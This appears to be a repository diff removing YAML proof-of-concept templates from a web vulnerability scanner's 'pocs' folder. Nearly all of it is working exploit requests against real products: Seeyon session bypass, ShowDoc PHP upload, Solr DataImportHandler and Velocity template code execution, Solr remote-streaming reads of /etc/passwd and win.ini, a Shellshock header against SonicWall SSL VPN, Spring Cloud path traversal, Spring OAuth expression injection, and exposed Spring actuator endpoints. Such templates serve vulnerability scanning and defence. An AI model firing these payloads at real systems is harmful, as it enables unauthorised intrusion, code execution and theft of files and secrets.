name: poc-yaml-seeyon-unauthoried
rules:
- method: POST
path: "/seeyon/thirdpartyController.do"
expression: "true"
body: |
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
search: >-
JSESSIONID=(?P<session>.+?)
- method: GET
path: "/seeyon/main.do"
headers:
Cookie: JSESSIONID={{session}}
expression: |
response.status == 200 && response.body.bcontains(b"当前已登录了一个用户,同一窗口中不能登录多个用户")
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://github.com/whami-root

25
WebScan/pocs/showdoc-uploadfile.yml
View File

@ -1,25 +0,0 @@
name: poc-yaml-showdoc-uploadfile
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: /index.php?s=/home/page/uploadImg
headers:
Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633"
follow_redirects: false
body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n<?php echo \"{{r2}}\"; unlink(__FILE__); ?>\n----------------------------835846770881083140190633--"
expression: |
response.status == 200 && response.body.bcontains(b"success")
search: |
(?P<date>\d{4}-\d{2}-\d{2})\\/(?P<file>[a-f0-9]+\.php)
- method: GET
path: /Public/Uploads/{{date}}/{{file}}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(r2))
detail:
author: White(https://github.com/WhiteHSBG)
Affected Version: "showdoc <= 2.8.6"
links:
- https://github.com/star7th/showdoc/pull/1059

30
WebScan/pocs/solr-cve-2019-0193.yml
View File

@ -1,30 +0,0 @@
name: poc-yaml-solr-cve-2019-0193
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: GET
path: /solr/admin/cores?wt=json
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"responseHeader")
search: '"name":"(?P<core>.*?)"'
- method: POST
path: >-
/solr/{{core}}/dataimport?command=full-import&debug=true&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3CdataConfig%3E%0D%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22DEBUG%22%20%2F%3E%0D%0A%3Cscript%3E%3C!%5BCDATA%5B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20function%20execute(row)%20%20%20%20%7B%0D%0Arow.put(%22id%22,{{r1}}*{{r2}})%3B%0D%0Areturn%20row%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%5D%5D%3E%3C%2Fscript%3E%0D%0A%3Cdocument%3E%0D%0A%20%20%20%20%3Centity%0D%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0D%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0D%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0D%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20forEach%3D%22%2Fbooks%2Fbook%22%0D%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Aexecute%22%20%3E%0D%0A%09%09%09%3Cfield%20column%3D%22id%22%20name%3D%22id%22%2F%3E%0D%0A%20%20%20%20%3C%2Fentity%3E%0D%0A%3C%2Fdocument%3E%0D%0A%3C%2FdataConfig%3E
headers:
Content-Type: text/html
body: |-
<?xml version="1.0" encoding="utf-8"?>
<books>
<book>
</book>
</books>
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: fnmsd(https://github.com/fnmsd)
solr_version: '<8.1.12'
vulnpath: '/solr/{{core}}/dataimport'
description: 'Apache Solr DataImportHandler Remote Code Execution Vulnerability(CVE-2019-0193)'
links:
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193

25
WebScan/pocs/solr-fileread1.yml
View File

@ -1,25 +0,0 @@
name: poc-yaml-solr-fileread1
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
expression: response.status == 200 && response.body.bcontains(b"responseHeader")
search: >-
"name":"(?P<core>.+?)"
- method: POST
path: "/solr/{{core}}/config"
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.body.bcontains(b"responseHeader")
- method: POST
path: "/solr/{{core}}/debug/dump?param=ContentStreams"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
stream.url=file:///etc/passwd
expression: |
response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body)
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186

25
WebScan/pocs/solr-fileread2.yml
View File

@ -1,25 +0,0 @@
name: poc-yaml-solr-fileread2
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
expression: "true"
search: >-
"name":"(?P<core>.+?)"
- method: POST
path: "/solr/{{core}}/config"
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.body.bcontains(b"responseHeader")
- method: POST
path: "/solr/{{core}}/debug/dump?param=ContentStreams"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
stream.url=file:///c://windows/win.ini
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186

38
WebScan/pocs/solr-velocity-template-rce.yml
View File

@ -1,38 +0,0 @@
name: poc-yaml-solr-velocity-template-rce
set:
r1: randomInt(20000, 40000)
r2: randomInt(20000, 40000)
rules:
- method: GET
path: "/solr/admin/cores?wt=json"
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"responseHeader")
search: |
"name":"(?P<core>[^"]+)"
- method: POST
path: >-
/solr/{{core}}/config
headers:
Content-Type: application/json
body: |-
{
"update-queryresponsewriter": {
"startup": "test",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
expression: response.status == 200
- method: GET
path: "/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24c%3D{{r1}}%20*%20{{r2}})%24c"
follow_redirects: false
expression: response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: Loneyer
description: 'Apache Solr RCE via Velocity template'
links:
- https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt
- https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2

16
WebScan/pocs/sonicwall-ssl-vpn-rce.yml
View File

@ -1,16 +0,0 @@
name: poc-yaml-sonicwall-ssl-vpn-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(1140000, 1144800)
rules:
- method: GET
path: /cgi-bin/jarrewrite.sh
follow_redirects: false
headers:
X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
detail:
author: sharecast
links:
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

12
WebScan/pocs/spring-actuator-heapdump-file.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-spring-actuator-heapdump-file
rules:
- method: HEAD
path: /actuator/heapdump
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/octet-stream")
detail:
author: AgeloVito
info: spring-actuator-heapdump-file
links:
- https://www.cnblogs.com/wyb628/p/8567610.html

15
WebScan/pocs/spring-cloud-cve-2020-5405.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-spring-cloud-cve-2020-5405
rules:
- method: GET
path: >-
/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit."))
detail:
version: <= 2.1.6, 2.2.1
author: kingkk(https://www.kingkk.com/)
links:
- https://pivotal.io/security/cve-2020-5405
- https://github.com/spring-cloud/spring-cloud-config

12
WebScan/pocs/spring-cloud-cve-2020-5410.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-spring-cloud-cve-2020-5410
rules:
- method: GET
path: >-
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9"
links:
- https://xz.aliyun.com/t/7877

15
WebScan/pocs/spring-cve-2016-4977.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-spring-cve-2016-4977
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: GET
path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test
follow_redirects: false
expression: >
response.body.bcontains(bytes(string(r1 * r2)))
detail:
Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)"
author: hanxiansheng26(https://github.com/hanxiansheng26)
links:
- https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977

12
WebScan/pocs/spring-heapdump-file.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-spring-heapdump-file
rules:
- method: HEAD
path: /heapdump
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/octet-stream")
detail:
author: AgeloVito
info: spring-heapdump-file
links:
- https://www.cnblogs.com/wyb628/p/8567610.html

9
WebScan/pocs/springboot-env-unauth.yml
View File

@ -1,9 +0,0 @@
name: poc-yaml-springboot-env-unauth
rules:
- method: GET
path: /env
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
detail:
links:
- https://github.com/LandGrey/SpringBootVulExploit

9
WebScan/pocs/springboot-env-unauth2.yml
View File

@ -1,9 +0,0 @@
name: poc-yaml-springboot-env-unauth
rules:
- method: GET
path: /actuator/env
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
detail:
links:
- https://github.com/LandGrey/SpringBootVulExploit

Some files were not shown because too many files have changed in this diff Show More